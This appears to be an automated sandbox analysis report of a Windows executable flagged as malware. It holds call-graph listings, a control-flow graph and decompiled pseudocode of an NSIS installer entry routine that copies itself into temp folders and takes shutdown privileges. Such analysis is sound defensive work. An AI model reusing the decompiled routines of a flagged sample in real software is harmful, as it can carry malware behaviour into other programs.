7456->7458 7457->7458 7459 403fbe 7457->7459 7460 404164 7458->7460 7461 404124 GetDlgItem GetDlgItem 7458->7461 7463 403fc9 SetWindowPos 7459->7463 7464 403fdc 7459->7464 7462 4041be 7460->7462 7473 401389 2 API calls 7460->7473 7465 404499 18 API calls 7461->7465 7484 40410e 7462->7484 7529 4044e5 7462->7529 7463->7464 7468 403fe5 ShowWindow 7464->7468 7469 404027 7464->7469 7466 40414e SetClassLongW 7465->7466 7470 40140b 2 API calls 7466->7470 7474 404100 7468->7474 7475 404005 GetWindowLongW 7468->7475 7471 404046 7469->7471 7472 40402f DestroyWindow 7469->7472 7470->7460 7476 40404b SetWindowLongW 7471->7476 7477 40405c 7471->7477 7528 404422 7472->7528 7478 404196 7473->7478 7551 404500 7474->7551 7475->7474 7480 40401e ShowWindow 7475->7480 7476->7484 7477->7474 7482 404068 GetDlgItem 7477->7482 7478->7462 7483 40419a SendMessageW 7478->7483 7480->7469 7481 404424 DestroyWindow EndDialog 7481->7528 7487 404096 7482->7487 7488 404079 SendMessageW IsWindowEnabled 7482->7488 7483->7484 7485 40140b 2 API calls 7495 4041d0 7485->7495 7486 404453 ShowWindow 7486->7484 7490 4040a3 7487->7490 7492 4040ea SendMessageW 7487->7492 7493 4040b6 7487->7493 7501 40409b 7487->7501 7488->7484 7488->7487 7489 40657a 17 API calls 7489->7495 7490->7492 7490->7501 7492->7474 7496 4040d3 7493->7496 7497 4040be 7493->7497 7494 4040d1 7494->7474 7495->7481 7495->7484 7495->7485 7495->7489 7498 404499 18 API calls 7495->7498 7519 404364 DestroyWindow 7495->7519 7532 404499 7495->7532 7499 40140b 2 API calls 7496->7499 7545 40140b 7497->7545 7498->7495 7502 4040da 7499->7502 7548 404472 7501->7548 7502->7474 7502->7501 7504 40424b GetDlgItem 7505 404260 7504->7505 7506 404268 ShowWindow KiUserCallbackDispatcher 7504->7506 7505->7506 7535 4044bb KiUserCallbackDispatcher 7506->7535 7508 404292 EnableWindow 7513 4042a6 7508->7513 7509 4042ab GetSystemMenu EnableMenuItem SendMessageW 7510 4042db SendMessageW 7509->7510 7509->7513 7510->7513 7513->7509 7536 4044ce SendMessageW 7513->7536 7537 403f7b 7513->7537 7540 40653d lstrcpynW 7513->7540 7515 40430a lstrlenW 7516 40657a 17 API calls 7515->7516 7517 404320 SetWindowTextW 7516->7517 7541 401389 7517->7541 7520 40437e CreateDialogParamW 7519->7520 7519->7528 7521 4043b1 7520->7521 7520->7528 7522 404499 18 API calls 7521->7522 7523 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 7522->7523 7524 401389 2 API calls 7523->7524 7525 404402 7524->7525 7525->7484 7526 40440a ShowWindow 7525->7526 7527 4044e5 SendMessageW 7526->7527 7527->7528 7528->7484 7528->7486 7530 4044fd 7529->7530 7531 4044ee SendMessageW 7529->7531 7530->7495 7531->7530 7533 40657a 17 API calls 7532->7533 7534 4044a4 SetDlgItemTextW 7533->7534 7534->7504 7535->7508 7536->7513 7538 40657a 17 API calls 7537->7538 7539 403f89 SetWindowTextW 7538->7539 7539->7513 7540->7515 7543 401390 7541->7543 7542 4013fe 7542->7495 7543->7542 7544 4013cb MulDiv SendMessageW 7543->7544 7544->7543 7546 401389 2 API calls 7545->7546 7547 401420 7546->7547 7547->7501 7549 404479 7548->7549 7550 40447f SendMessageW 7548->7550 7549->7550 7550->7494 7552 4045c3 7551->7552 7553 404518 GetWindowLongW 7551->7553 7552->7484 7553->7552 7554 40452d 7553->7554 7554->7552 7555 40455a GetSysColor 7554->7555 7556 40455d 7554->7556 7555->7556 7557 404563 SetTextColor 7556->7557 7558 40456d SetBkMode 7556->7558 7557->7558 7559 404585 GetSysColor 7558->7559 7560 40458b 7558->7560 7559->7560 7561 404592 SetBkColor 7560->7561 7562 40459c 7560->7562 7561->7562 7562->7552 7563 4045b6 CreateBrushIndirect 7562->7563 7564 4045af DeleteObject 7562->7564 7563->7552 7564->7563 7639 40259e 7650 402de6 7639->7650 7642 402d84 17 API calls 7643 4025b1 7642->7643 7644 4025d9 RegEnumValueW 7643->7644 7645 4025cd RegEnumKeyW 7643->7645 7648 40292e 7643->7648 7646 4025f5 RegCloseKey 7644->7646 7647 4025ee 7644->7647 7645->7646 7646->7648 7647->7646 7651 402da6 17 API calls 7650->7651 7652 402dfd 7651->7652 7653 4063aa RegOpenKeyExW 7652->7653 7654 4025a8 7653->7654 7654->7642 7655 4015a3 7656 402da6 17 API calls 7655->7656 7657 4015aa SetFileAttributesW 7656->7657 7658 4015bc 7657->7658 7955 4023b2 7956 4023c0 7955->7956 7957 4023ba 7955->7957 7959 4023ce 7956->7959 7960 402da6 17 API calls 7956->7960 7958 402da6 17 API calls 7957->7958 7958->7956 7961 4023dc 7959->7961 7962 402da6 17 API calls 7959->7962 7960->7959 7963 402da6 17 API calls 7961->7963 7962->7961 7964 4023e5 WritePrivateProfileStringW 7963->7964 8692 2aab05e 8695 2aaaf3a 8692->8695 8693 2abaa81 4 API calls 8694 2abaa7c 8693->8694 8696 2abaa81 4 API calls 8694->8696 8695->8693 8697 2aab295 8695->8697 8696->8694 8697->8697

                                                                            Executed Functions

                                                                            Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 58 4037d6-4037d7 41->58 45 403714-40371b 42->45 46 40372c-403765 42->46 51 403722 45->51 52 40371d-403720 45->52 53 403781-4037bb 46->53 54 403767-40376c 46->54 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 call 403b12 OleUninitialize 48->65 51->46 52->46 52->51 56 4037c3-4037c5 53->56 57 4037bd-4037c1 53->57 54->53 60 40376e-403776 54->60 56->41 57->56 63 4037e6-4037f3 call 40653d 57->63 58->32 66 403778-40377b 60->66 67 40377d 60->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 79 403a69-403a78 call 405b9d ExitProcess 65->79 80 403a7e-403a84 65->80 66->53 66->67 67->53 84 4038f9-403906 69->84 85 4038a9-4038de 69->85 78 403941-403944 70->78 78->65 82 403a86-403a9b GetCurrentProcess OpenProcessToken 80->82 83 403afc-403b04 80->83 89 403acc-403ada call 40690a 82->89 90 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 82->90 92 403b06 83->92 93 403b09-403b0c ExitProcess 83->93 86 403908-403916 call 405f14 84->86 87 403949-40395d call 405b08 lstrcatW 84->87 91 4038e0-4038e4 85->91 86->65 103 40391c-403932 call 40653d * 2 86->103 106 40396a-403984 lstrcatW lstrcmpiW 87->106 107 40395f-403965 lstrcatW 87->107 104 403ae8-403af3 ExitWindowsEx 89->104 105 403adc-403ae6 89->105 90->89 97 4038e6-4038eb 91->97 98 4038ed-4038f5 91->98 92->93 97->98 102 4038f7 97->102 98->91 98->102 102->84 103->70 104->83 111 403af5-403af7 call 40140b 104->111 105->104 105->111 108 403a57 106->108 109 40398a-40398d 106->109 107->106 108->65 112 403996 call 405aeb 109->112 113 40398f-403994 call 405a6e 109->113 111->83 121 40399b-4039ab SetCurrentDirectoryW 112->121 113->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->108 142->131
                                                                            C-Code - Quality: 79%
                                                                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                            0x0040353b
                                                                            0x0040353c
                                                                            0x00403543
                                                                            0x00403546
                                                                            0x0040354d
                                                                            0x00403550
                                                                            0x00403563
                                                                            0x00403569
                                                                            0x0040356c
                                                                            0x0040356f
                                                                            0x0040357d
                                                                            0x00403585
                                                                            0x00403590
                                                                            0x004035a9
                                                                            0x004035ab
                                                                            0x004035b3
                                                                            0x004035b3
                                                                            0x004035be
                                                                            0x004035c0
                                                                            0x004035c0
                                                                            0x004035d5
                                                                            0x004035fa
                                                                            0x00403608
                                                                            0x0040360b
                                                                            0x00403612
                                                                            0x00403619
                                                                            0x00403619
                                                                            0x00403612
                                                                            0x0040361b
                                                                            0x00403620
                                                                            0x00403621
                                                                            0x0040362d
                                                                            0x00403631
                                                                            0x00403638
                                                                            0x00403646
                                                                            0x0040364b
                                                                            0x00403652
                                                                            0x00403656
                                                                            0x0040365a
                                                                            0x0040365c
                                                                            0x0040365c
                                                                            0x0040365a
                                                                            0x00403663
                                                                            0x0040366a
                                                                            0x00403670
                                                                            0x00403688
                                                                            0x00403698
                                                                            0x0040369d
                                                                            0x004036a3
                                                                            0x004036aa
                                                                            0x004036b1
                                                                            0x004036b3
                                                                            0x004036b4
                                                                            0x004036be
                                                                            0x004036c5
                                                                            0x004036c7
                                                                            0x004036c9
                                                                            0x004036c9
                                                                            0x004036dc
                                                                            0x004036de
                                                                            0x004037d8
                                                                            0x004037d8
                                                                            0x004037db
                                                                            0x004037de
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036e8
                                                                            0x004036e9
                                                                            0x004036ec
                                                                            0x004036f5
                                                                            0x004036f5
                                                                            0x004036f8
                                                                            0x004036fb
                                                                            0x004036fe
                                                                            0x00403701
                                                                            0x00403701
                                                                            0x00403701
                                                                            0x00403702
                                                                            0x00403706
                                                                            0x004037c6
                                                                            0x004037cf
                                                                            0x004037d1
                                                                            0x004037d4
                                                                            0x004037d7
                                                                            0x004037d7
                                                                            0x004037d7
                                                                            0x00000000
                                                                            0x0040370c
                                                                            0x0040370d
                                                                            0x0040370e
                                                                            0x00403712
                                                                            0x0040372c
                                                                            0x00403733
                                                                            0x00403746
                                                                            0x00403747
                                                                            0x0040375c
                                                                            0x00403761
                                                                            0x00403763
                                                                            0x00403765
                                                                            0x00403781
                                                                            0x00403788
                                                                            0x0040379b
                                                                            0x0040379c
                                                                            0x004037b1
                                                                            0x004037b7
                                                                            0x004037b9
                                                                            0x004037bb
                                                                            0x004037c3
                                                                            0x004037c5
                                                                            0x00000000
                                                                            0x004037c5
                                                                            0x004037bf
                                                                            0x004037c1
                                                                            0x004037e6
                                                                            0x004037ea
                                                                            0x004037f3
                                                                            0x004037f8
                                                                            0x004037fe
                                                                            0x00403809
                                                                            0x0040380b
                                                                            0x00403810
                                                                            0x00403812
                                                                            0x0040386a
                                                                            0x0040386f
                                                                            0x00403878
                                                                            0x0040387f
                                                                            0x00403882
                                                                            0x00403a59
                                                                            0x00403a59
                                                                            0x00403a5e
                                                                            0x00403a67
                                                                            0x00403a84
                                                                            0x00403afc
                                                                            0x00403afc
                                                                            0x00403b04
                                                                            0x00403b06
                                                                            0x00403b06
                                                                            0x00403b0c
                                                                            0x00403b0c
                                                                            0x00403a9b
                                                                            0x00403aa7
                                                                            0x00403ab8
                                                                            0x00403abf
                                                                            0x00403ac6
                                                                            0x00403ac6
                                                                            0x00403ace
                                                                            0x00403ada
                                                                            0x00403ae8
                                                                            0x00403af3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403adc
                                                                            0x00403adc
                                                                            0x00403add
                                                                            0x00403adf
                                                                            0x00403ae0
                                                                            0x00403ae1
                                                                            0x00403ae6
                                                                            0x00403af5
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403ae6
                                                                            0x00403ada
                                                                            0x00403a71
                                                                            0x00403a78
                                                                            0x00403a78
                                                                            0x0040388e
                                                                            0x00403935
                                                                            0x00403935
                                                                            0x00403941
                                                                            0x00000000
                                                                            0x00403941
                                                                            0x0040389f
                                                                            0x004038a7
                                                                            0x004038f9
                                                                            0x004038f9
                                                                            0x004038ff
                                                                            0x00403906
                                                                            0x00403954
                                                                            0x00403956
                                                                            0x0040395b
                                                                            0x0040395d
                                                                            0x00403965
                                                                            0x00403965
                                                                            0x00403970
                                                                            0x00403975
                                                                            0x0040397c
                                                                            0x00403982
                                                                            0x00403984
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00000000
                                                                            0x0040398a
                                                                            0x0040398a
                                                                            0x0040398c
                                                                            0x0040398d
                                                                            0x00403996
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040399c
                                                                            0x004039a4
                                                                            0x004039ab
                                                                            0x004039b3
                                                                            0x004039b3
                                                                            0x004039c0
                                                                            0x004039cc
                                                                            0x004039d6
                                                                            0x004039d6
                                                                            0x004039d8
                                                                            0x004039df
                                                                            0x004039e9
                                                                            0x004039f5
                                                                            0x004039fb
                                                                            0x00403a01
                                                                            0x00403a04
                                                                            0x00403a0e
                                                                            0x00403a14
                                                                            0x00403a16
                                                                            0x00403a1a
                                                                            0x00403a2b
                                                                            0x00403a31
                                                                            0x00403a36
                                                                            0x00403a38
                                                                            0x00403a3b
                                                                            0x00403a41
                                                                            0x00403a41
                                                                            0x00403a38
                                                                            0x00403a16
                                                                            0x00403a44
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a52
                                                                            0x00000000
                                                                            0x00403a52
                                                                            0x00403984
                                                                            0x00403908
                                                                            0x0040390b
                                                                            0x0040390f
                                                                            0x00403914
                                                                            0x00403916
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403922
                                                                            0x0040392d
                                                                            0x00403932
                                                                            0x00000000
                                                                            0x00403932
                                                                            0x004038b0
                                                                            0x004038c8
                                                                            0x004038d9
                                                                            0x004038da
                                                                            0x004038de
                                                                            0x004038e0
                                                                            0x004038ee
                                                                            0x004038f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004038f5
                                                                            0x004038f7
                                                                            0x00000000
                                                                            0x004038f7
                                                                            0x0040381a
                                                                            0x00403826
                                                                            0x0040382b
                                                                            0x00403830
                                                                            0x00403832
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040383a
                                                                            0x00403842
                                                                            0x00403853
                                                                            0x0040385b
                                                                            0x0040385d
                                                                            0x00403862
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x004037c1
                                                                            0x0040376a
                                                                            0x0040376c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040376e
                                                                            0x00403772
                                                                            0x00403776
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x00000000
                                                                            0x0040377d
                                                                            0x00403778
                                                                            0x0040377b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040377b
                                                                            0x00403714
                                                                            0x00403718
                                                                            0x0040371b
                                                                            0x00403722
                                                                            0x00403722
                                                                            0x00000000
                                                                            0x00403722
                                                                            0x0040371d
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x004036ee
                                                                            0x004036ef
                                                                            0x004036f0
                                                                            0x004036f0
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x00000000

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                            • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000000), ref: 004036D6
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
